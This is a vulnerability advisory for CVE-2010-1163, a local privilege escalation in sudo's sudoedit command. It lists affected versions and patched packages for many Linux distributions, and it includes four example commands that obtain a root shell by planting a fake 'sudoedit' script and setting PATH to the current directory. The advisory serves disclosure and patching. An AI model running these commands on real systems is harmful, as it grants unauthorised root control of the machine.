Todd Miller Sudo 'sudoedit' Path Resolution Local Privilege Escalation Vulnerability

Bugtraq ID:	39468
Class:	Design Error
CVE:	CVE-2010-1163
Remote:	No
Local:	Yes
Published:	Apr 14 2010 12:00AM
Updated:	Nov 14 2014 02:00AM
Credit:	Valerio Costamagna
Vulnerable:	Ubuntu Ubuntu Linux 9.10 sparc Ubuntu Ubuntu Linux 9.10 powerpc Ubuntu Ubuntu Linux 9.10 lpia Ubuntu Ubuntu Linux 9.10 i386 Ubuntu Ubuntu Linux 9.10 amd64 Ubuntu Ubuntu Linux 9.04 sparc Ubuntu Ubuntu Linux 9.04 powerpc Ubuntu Ubuntu Linux 9.04 lpia Ubuntu Ubuntu Linux 9.04 i386 Ubuntu Ubuntu Linux 9.04 amd64 Ubuntu Ubuntu Linux 8.10 sparc Ubuntu Ubuntu Linux 8.10 powerpc Ubuntu Ubuntu Linux 8.10 lpia Ubuntu Ubuntu Linux 8.10 i386 Ubuntu Ubuntu Linux 8.10 amd64 Ubuntu Ubuntu Linux 8.04 LTS sparc Ubuntu Ubuntu Linux 8.04 LTS powerpc Ubuntu Ubuntu Linux 8.04 LTS lpia Ubuntu Ubuntu Linux 8.04 LTS i386 Ubuntu Ubuntu Linux 8.04 LTS amd64 Ubuntu Ubuntu Linux 6.06 LTS sparc Ubuntu Ubuntu Linux 6.06 LTS powerpc Ubuntu Ubuntu Linux 6.06 LTS i386 Ubuntu Ubuntu Linux 6.06 LTS amd64 Todd Miller Sudo 1.7.2 p5 Todd Miller Sudo 1.7.2 p4 Todd Miller Sudo 1.7.2 p3 Todd Miller Sudo 1.7 Todd Miller Sudo 1.6.9 p19 Todd Miller Sudo 1.6.9 p18 Todd Miller Sudo 1.6.9 p17 Todd Miller Sudo 1.6.8 p9 Todd Miller Sudo 1.6.8 p8 + OpenPKG OpenPKG 2.4 + OpenPKG OpenPKG Current + Red Hat Fedora Core4 Todd Miller Sudo 1.6.8 p7 + Debian Linux 3.1 sparc + Debian Linux 3.1 s/390 + Debian Linux 3.1 ppc + Debian Linux 3.1 mipsel + Debian Linux 3.1 mips + Debian Linux 3.1 m68k + Debian Linux 3.1 ia-64 + Debian Linux 3.1 ia-32 + Debian Linux 3.1 hppa + Debian Linux 3.1 arm + Debian Linux 3.1 amd64 + Debian Linux 3.1 alpha + Debian Linux 3.1 + OpenPKG OpenPKG 2.3 Todd Miller Sudo 1.6.8 p5 + Ubuntu Ubuntu Linux 5.0 4 powerpc + Ubuntu Ubuntu Linux 5.0 4 i386 + Ubuntu Ubuntu Linux 5.0 4 amd64 Todd Miller Sudo 1.6.8 p4 Todd Miller Sudo 1.6.8 p2 + Trustix Secure Linux 2.2 Todd Miller Sudo 1.6.8 p12 Todd Miller Sudo 1.6.8 p1 + Mandriva Linux Mandrake 10.2 x86_64 + Mandriva Linux Mandrake 10.2 + Mandriva Linux Mandrake 10.1 x86_64 + Mandriva Linux Mandrake 10.1 + OpenPKG OpenPKG 2.2 + OpenPKG OpenPKG Current Todd Miller Sudo 1.6.8 Todd Miller Sudo 1.6.9 p21 Todd Miller Sudo 1.6.9 p20 SuSE openSUSE 11.3 Slackware Linux 10.2 Slackware Linux 10.1 Slackware Linux 10.0 Slackware Linux 9.1 Slackware Linux 9.0 Slackware Linux 8.1 Slackware Linux x86_64 -current Slackware Linux 13.0 x86_64 Slackware Linux 13.0 Slackware Linux 12.2 Slackware Linux 12.1 Slackware Linux 12.0 Slackware Linux 11.0 Slackware Linux -current S.u.S.E. openSUSE 11.2 rPath rPath Linux 2 rPath Appliance Platform Linux Service 2 Red Hat Enterprise Linux Desktop 5 client Red Hat Enterprise Linux 5 Server Mandriva Linux Mandrake 2010.0 x86_64 Mandriva Linux Mandrake 2010.0 Mandriva Linux Mandrake 2009.1 x86_64 Mandriva Linux Mandrake 2009.1 Mandriva Linux Mandrake 2009.0 x86_64 Mandriva Linux Mandrake 2009.0 Mandriva Linux Mandrake 2008.0 x86_64 Mandriva Linux Mandrake 2008.0 MandrakeSoft Enterprise Server 5 x86_64 MandrakeSoft Enterprise Server 5 MandrakeSoft Corporate Server 4.0 x86_64 MandrakeSoft Corporate Server 4.0 Gentoo Linux Avaya Voice Portal 5.1 Avaya Voice Portal 5.0 Avaya Aura System Manager 6.0 SP1 Avaya Aura System Manager 5.2 Avaya Aura Session Manager 6.0 SP1 Avaya Aura Session Manager 6.0 Avaya Aura Session Manager 5.2 Avaya Aura Session Manager 1.1 Avaya Aura Application Enablement Services 5.2.1 Avaya Aura Application Enablement Services 5.2
Not Vulnerable:	Todd Miller Sudo 1.7.2 p6 Todd Miller Sudo 1.6.9 p22

Todd Miller Sudo 'sudoedit' Path Resolution Local Privilege Escalation Vulnerability

Todd Miller 'sudo' is prone to a local privilege-escalation vulnerability because it fails to correctly handle the 'sudoedit' command.

Local attackers could exploit this issue to run arbitrary commands as the 'root' user. Successful exploits can completely compromise an affected computer.

NOTE: This issue is related to, but different from, the issue described in BID 38362 (Todd Miller Sudo 'sudoedit' Local Privilege Escalation Vulnerability).

This issue affects 'sudo' 1.6.8 up to and including 1.7.2p5.

Todd Miller Sudo 'sudoedit' Path Resolution Local Privilege Escalation Vulnerability

Local attackers can use readily available commands to exploit this issue.

The following example commands are available:

$ echo "/bin/sh" > sudoedit
$ /usr/bin/chmod +x sudoedit
$ export PATH=.
$ /usr/bin/sudo sudoedit /etc/hosts

Todd Miller Sudo 'sudoedit' Path Resolution Local Privilege Escalation Vulnerability

Solution:
Updates are available. Please see the references for more information.


Ubuntu Ubuntu Linux 9.10 sparc

• Ubuntu sudo-ldap_1.7.0-1ubuntu2.2_sparc.deb
  http://ports.ubuntu.com/pool/universe/s/sudo/sudo-ldap_1.7.0-1ubuntu2. 2_sparc.deb


• Ubuntu sudo_1.7.0-1ubuntu2.2_sparc.deb
  http://ports.ubuntu.com/pool/main/s/sudo/sudo_1.7.0-1ubuntu2.2_sparc.d eb

Slackware Linux 12.0

• Slackware sudo-1.7.2p6-i486-1_slack12.0.tgz
  ftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/ sudo-1.7.2p6-i486-1_slack12.0.tgz

Slackware Linux -current

• Slackware sudo-1.7.2p6-i486-1.txz
  ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/ap/s udo-1.7.2p6-i486-1.txz

Ubuntu Ubuntu Linux 8.04 LTS powerpc

• Ubuntu sudo-ldap_1.6.9p10-1ubuntu3.7_powerpc.deb
  http://ports.ubuntu.com/pool/universe/s/sudo/sudo-ldap_1.6.9p10-1ubunt u3.7_powerpc.deb


• Ubuntu sudo_1.6.9p10-1ubuntu3.7_powerpc.deb
  http://ports.ubuntu.com/pool/main/s/sudo/sudo_1.6.9p10-1ubuntu3.7_powe rpc.deb

Ubuntu Ubuntu Linux 8.10 powerpc

• Ubuntu sudo-ldap_1.6.9p17-1ubuntu2.3_powerpc.deb
  http://ports.ubuntu.com/pool/universe/s/sudo/sudo-ldap_1.6.9p17-1ubunt u2.3_powerpc.deb


• Ubuntu sudo_1.6.9p17-1ubuntu2.3_powerpc.deb
  http://ports.ubuntu.com/pool/main/s/sudo/sudo_1.6.9p17-1ubuntu2.3_powe rpc.deb

Ubuntu Ubuntu Linux 8.04 LTS sparc

• Ubuntu sudo-ldap_1.6.9p10-1ubuntu3.7_sparc.deb
  http://ports.ubuntu.com/pool/universe/s/sudo/sudo-ldap_1.6.9p10-1ubunt u3.7_sparc.deb


• Ubuntu sudo_1.6.9p10-1ubuntu3.7_sparc.deb
  http://ports.ubuntu.com/pool/main/s/sudo/sudo_1.6.9p10-1ubuntu3.7_spar c.deb

Slackware Linux 12.2

• Slackware sudo-1.7.2p6-i486-1_slack12.2.tgz
  ftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/ sudo-1.7.2p6-i486-1_slack12.2.tgz

Ubuntu Ubuntu Linux 9.10 powerpc

• Ubuntu sudo-ldap_1.7.0-1ubuntu2.2_powerpc.deb
  http://ports.ubuntu.com/pool/universe/s/sudo/sudo-ldap_1.7.0-1ubuntu2. 2_powerpc.deb


• Ubuntu sudo_1.7.0-1ubuntu2.2_powerpc.deb
  http://ports.ubuntu.com/pool/main/s/sudo/sudo_1.7.0-1ubuntu2.2_powerpc .deb

Ubuntu Ubuntu Linux 6.06 LTS sparc

• Ubuntu sudo-ldap_1.6.8p12-1ubuntu6.2_sparc.deb
  http://security.ubuntu.com/ubuntu/pool/universe/s/sudo/sudo-ldap_1.6.8 p12-1ubuntu6.2_sparc.deb


• Ubuntu sudo_1.6.8p12-1ubuntu6.2_sparc.deb
  http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p12-1ubun tu6.2_sparc.deb

Mandriva Linux Mandrake 2008.0 x86_64

• Mandriva sudo-1.6.9p5-1.3mdv2008.0.x86_64.rpm
  http://www.mandriva.com/en/download/

Ubuntu Ubuntu Linux 8.04 LTS amd64

• Ubuntu sudo-ldap_1.6.9p10-1ubuntu3.7_amd64.deb
  http://security.ubuntu.com/ubuntu/pool/universe/s/sudo/sudo-ldap_1.6.9 p10-1ubuntu3.7_amd64.deb


• Ubuntu sudo_1.6.9p10-1ubuntu3.7_amd64.deb
  http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.9p10-1ubun tu3.7_amd64.deb

Mandriva Linux Mandrake 2008.0

• Mandriva sudo-1.6.9p5-1.3mdv2008.0.i586.rpm
  http://www.mandriva.com/en/download/

Ubuntu Ubuntu Linux 9.10 lpia

• Ubuntu sudo-ldap_1.7.0-1ubuntu2.2_lpia.deb
  http://ports.ubuntu.com/pool/universe/s/sudo/sudo-ldap_1.7.0-1ubuntu2. 2_lpia.deb


• Ubuntu sudo_1.7.0-1ubuntu2.2_lpia.deb
  http://ports.ubuntu.com/pool/main/s/sudo/sudo_1.7.0-1ubuntu2.2_lpia.de b

Ubuntu Ubuntu Linux 9.04 sparc

• Ubuntu sudo-ldap_1.6.9p17-1ubuntu3.2_sparc.deb
  http://ports.ubuntu.com/pool/universe/s/sudo/sudo-ldap_1.6.9p17-1ubunt u3.2_sparc.deb


• Ubuntu sudo_1.6.9p17-1ubuntu3.2_sparc.deb
  http://ports.ubuntu.com/pool/main/s/sudo/sudo_1.6.9p17-1ubuntu3.2_spar c.deb

Mandriva Linux Mandrake 2010.0

• Mandriva sudo-1.7.2-0.p1.1.2mdv2010.0.i586.rpm
  http://www.mandriva.com/en/download/

Ubuntu Ubuntu Linux 9.04 powerpc

• Ubuntu sudo-ldap_1.6.9p17-1ubuntu3.2_powerpc.deb
  http://ports.ubuntu.com/pool/universe/s/sudo/sudo-ldap_1.6.9p17-1ubunt u3.2_powerpc.deb


• Ubuntu sudo_1.6.9p17-1ubuntu3.2_powerpc.deb
  http://ports.ubuntu.com/pool/main/s/sudo/sudo_1.6.9p17-1ubuntu3.2_powe rpc.deb

Slackware Linux 12.1

• Slackware sudo-1.7.2p6-i486-1_slack12.1.tgz
  ftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/ sudo-1.7.2p6-i486-1_slack12.1.tgz

Ubuntu Ubuntu Linux 9.04 i386

• Ubuntu sudo-ldap_1.6.9p17-1ubuntu3.2_i386.deb
  http://security.ubuntu.com/ubuntu/pool/universe/s/sudo/sudo-ldap_1.6.9 p17-1ubuntu3.2_i386.deb


• Ubuntu sudo_1.6.9p17-1ubuntu3.2_i386.deb
  http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.9p17-1ubun tu3.2_i386.deb

Ubuntu Ubuntu Linux 9.04 lpia

• Ubuntu sudo-ldap_1.6.9p17-1ubuntu3.2_lpia.deb
  http://ports.ubuntu.com/pool/universe/s/sudo/sudo-ldap_1.6.9p17-1ubunt u3.2_lpia.deb


• Ubuntu sudo_1.6.9p17-1ubuntu3.2_lpia.deb
  http://ports.ubuntu.com/pool/main/s/sudo/sudo_1.6.9p17-1ubuntu3.2_lpia .deb

Ubuntu Ubuntu Linux 8.10 sparc

• Ubuntu sudo-ldap_1.6.9p17-1ubuntu2.3_sparc.deb
  http://ports.ubuntu.com/pool/universe/s/sudo/sudo-ldap_1.6.9p17-1ubunt u2.3_sparc.deb


• Ubuntu sudo_1.6.9p17-1ubuntu2.3_sparc.deb
  http://ports.ubuntu.com/pool/main/s/sudo/sudo_1.6.9p17-1ubuntu2.3_spar c.deb

Ubuntu Ubuntu Linux 9.10 i386

• Ubuntu sudo-ldap_1.7.0-1ubuntu2.2_i386.deb
  http://security.ubuntu.com/ubuntu/pool/universe/s/sudo/sudo-ldap_1.7.0 -1ubuntu2.2_i386.deb


• Ubuntu sudo_1.7.0-1ubuntu2.2_i386.deb
  http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.7.0-1ubuntu2 .2_i386.deb

Ubuntu Ubuntu Linux 9.10 amd64

• Ubuntu sudo-ldap_1.7.0-1ubuntu2.2_amd64.deb
  http://security.ubuntu.com/ubuntu/pool/universe/s/sudo/sudo-ldap_1.7.0 -1ubuntu2.2_amd64.deb


• Ubuntu sudo_1.7.0-1ubuntu2.2_amd64.deb
  http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.7.0-1ubuntu2 .2_amd64.deb

Mandriva Linux Mandrake 2009.0 x86_64

• Mandriva sudo-1.6.9p17-1.4mdv2009.0.x86_64.rpm
  http://www.mandriva.com/en/download/

Ubuntu Ubuntu Linux 9.04 amd64

• Ubuntu sudo-ldap_1.6.9p17-1ubuntu3.2_amd64.deb
  http://security.ubuntu.com/ubuntu/pool/universe/s/sudo/sudo-ldap_1.6.9 p17-1ubuntu3.2_amd64.deb


• Ubuntu sudo_1.6.9p17-1ubuntu3.2_amd64.deb
  http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.9p17-1ubun tu3.2_amd64.deb

Mandriva Linux Mandrake 2009.1

• Mandriva sudo-1.7.0-1.4mdv2009.1.i586.rpm
  http://www.mandriva.com/en/download/

Ubuntu Ubuntu Linux 8.10 amd64

• Ubuntu sudo-ldap_1.6.9p17-1ubuntu2.3_amd64.deb
  http://security.ubuntu.com/ubuntu/pool/universe/s/sudo/sudo-ldap_1.6.9 p17-1ubuntu2.3_amd64.deb


• Ubuntu sudo_1.6.9p17-1ubuntu2.3_amd64.deb
  http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.9p17-1ubun tu2.3_amd64.deb

Slackware Linux x86_64 -current

• Slackware sudo-1.7.2p6-x86_64-1.txz
  ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/ ap/sudo-1.7.2p6-x86_64-1.txz

Mandriva Linux Mandrake 2009.1 x86_64

• Mandriva sudo-1.7.0-1.4mdv2009.1.x86_64.rpm
  http://www.mandriva.com/en/download/

Ubuntu Ubuntu Linux 8.10 i386

• Ubuntu sudo-ldap_1.6.9p17-1ubuntu2.3_i386.deb
  http://security.ubuntu.com/ubuntu/pool/universe/s/sudo/sudo-ldap_1.6.9 p17-1ubuntu2.3_i386.deb


• Ubuntu sudo_1.6.9p17-1ubuntu2.3_i386.deb
  http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.9p17-1ubun tu2.3_i386.deb

MandrakeSoft Enterprise Server 5 x86_64

• Mandriva sudo-1.6.9p17-1.4mdvmes5.1.x86_64.rpm
  http://www.mandriva.com/en/download/

Ubuntu Ubuntu Linux 6.06 LTS powerpc

• Ubuntu sudo-ldap_1.6.8p12-1ubuntu6.2_powerpc.deb
  http://security.ubuntu.com/ubuntu/pool/universe/s/sudo/sudo-ldap_1.6.8 p12-1ubuntu6.2_powerpc.deb


• Ubuntu sudo_1.6.8p12-1ubuntu6.2_powerpc.deb
  http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p12-1ubun tu6.2_powerpc.deb

MandrakeSoft Enterprise Server 5

• Mandriva sudo-1.6.9p17-1.4mdvmes5.1.i586.rpm
  http://www.mandriva.com/en/download/

Ubuntu Ubuntu Linux 8.04 LTS lpia

• Ubuntu sudo-ldap_1.6.9p10-1ubuntu3.7_lpia.deb
  http://ports.ubuntu.com/pool/universe/s/sudo/sudo-ldap_1.6.9p10-1ubunt u3.7_lpia.deb


• Ubuntu sudo_1.6.9p10-1ubuntu3.7_lpia.deb
  http://ports.ubuntu.com/pool/main/s/sudo/sudo_1.6.9p10-1ubuntu3.7_lpia .deb

Ubuntu Ubuntu Linux 6.06 LTS i386

• Ubuntu sudo-ldap_1.6.8p12-1ubuntu6.2_i386.deb
  http://security.ubuntu.com/ubuntu/pool/universe/s/sudo/sudo-ldap_1.6.8 p12-1ubuntu6.2_i386.deb


• Ubuntu sudo_1.6.8p12-1ubuntu6.2_i386.deb
  http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p12-1ubun tu6.2_i386.deb

Ubuntu Ubuntu Linux 8.10 lpia

• Ubuntu sudo-ldap_1.6.9p17-1ubuntu2.3_lpia.deb
  http://ports.ubuntu.com/pool/universe/s/sudo/sudo-ldap_1.6.9p17-1ubunt u2.3_lpia.deb


• Ubuntu sudo_1.6.9p17-1ubuntu2.3_lpia.deb
  http://ports.ubuntu.com/pool/main/s/sudo/sudo_1.6.9p17-1ubuntu2.3_lpia .deb

Slackware Linux 13.0 x86_64

• Slackware sudo-1.7.2p6-x86_64-1_slack13.0.txz
  ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/package s/sudo-1.7.2p6-x86_64-1_slack13.0.txz

Ubuntu Ubuntu Linux 6.06 LTS amd64

• Ubuntu sudo-ldap_1.6.8p12-1ubuntu6.2_amd64.deb
  http://security.ubuntu.com/ubuntu/pool/universe/s/sudo/sudo-ldap_1.6.8 p12-1ubuntu6.2_amd64.deb


• Ubuntu sudo_1.6.8p12-1ubuntu6.2_amd64.deb
  http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p12-1ubun tu6.2_amd64.deb

Mandriva Linux Mandrake 2010.0 x86_64

• Mandriva sudo-1.7.2-0.p1.1.2mdv2010.0.x86_64.rpm
  http://www.mandriva.com/en/download/

Mandriva Linux Mandrake 2009.0

• Mandriva sudo-1.6.9p17-1.4mdv2009.0.i586.rpm
  http://www.mandriva.com/en/download/

Slackware Linux 13.0

• Slackware sudo-1.7.2p6-i486-1_slack13.0.txz
  ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ sudo-1.7.2p6-i486-1_slack13.0.txz

MandrakeSoft Corporate Server 4.0

• Mandriva sudo-1.6.8p8-2.5.20060mlcs4.i586.rpm
  http://www.mandriva.com/en/download/

Ubuntu Ubuntu Linux 8.04 LTS i386

• Ubuntu sudo-ldap_1.6.9p10-1ubuntu3.7_i386.deb
  http://security.ubuntu.com/ubuntu/pool/universe/s/sudo/sudo-ldap_1.6.9 p10-1ubuntu3.7_i386.deb


• Ubuntu sudo_1.6.9p10-1ubuntu3.7_i386.deb
  http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.9p10-1ubun tu3.7_i386.deb

Slackware Linux 10.0

• Slackware sudo-1.7.2p6-i486-1_slack10.0.tgz
  ftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/ sudo-1.7.2p6-i486-1_slack10.0.tgz

Slackware Linux 10.1

• Slackware sudo-1.7.2p6-i486-1_slack10.1.tgz
  ftp://ftp.slackware.com/pub/slackware/slackware-10.1/patches/packages/ sudo-1.7.2p6-i486-1_slack10.1.tgz

Slackware Linux 10.2

• Slackware sudo-1.7.2p6-i486-1_slack10.2.tgz
  ftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/ sudo-1.7.2p6-i486-1_slack10.2.tgz

MandrakeSoft Corporate Server 4.0 x86_64

• Mandriva sudo-1.6.8p8-2.5.20060mlcs4.x86_64.rpm
  http://www.mandriva.com/en/download/

Slackware Linux 8.1

• Slackware sudo-1.7.2p6-i386-1_slack8.1.tgz
  ftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/s udo-1.7.2p6-i386-1_slack8.1.tgz

Slackware Linux 9.0

• Slackware sudo-1.7.2p6-i386-1_slack9.0.tgz
  ftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/s udo-1.7.2p6-i386-1_slack9.0.tgz

Slackware Linux 9.1

• Slackware sudo-1.7.2p6-i486-1_slack9.1.tgz
  ftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/s udo-1.7.2p6-i486-1_slack9.1.tgz

Todd Miller Sudo 'sudoedit' Path Resolution Local Privilege Escalation Vulnerability

References:

• Sudo Homepage (Sudo)
  
• sudoedit local privilege escalation through PATH manipulation (Mediaservice.net)
  
• sudoedit local privilege escalation through PATH manipulation (Agazzini Maurizio )
  
• Additional privilege escalation bug with sudoedit (Todd Miller)
  
• ASA-2010-128 (Avaya)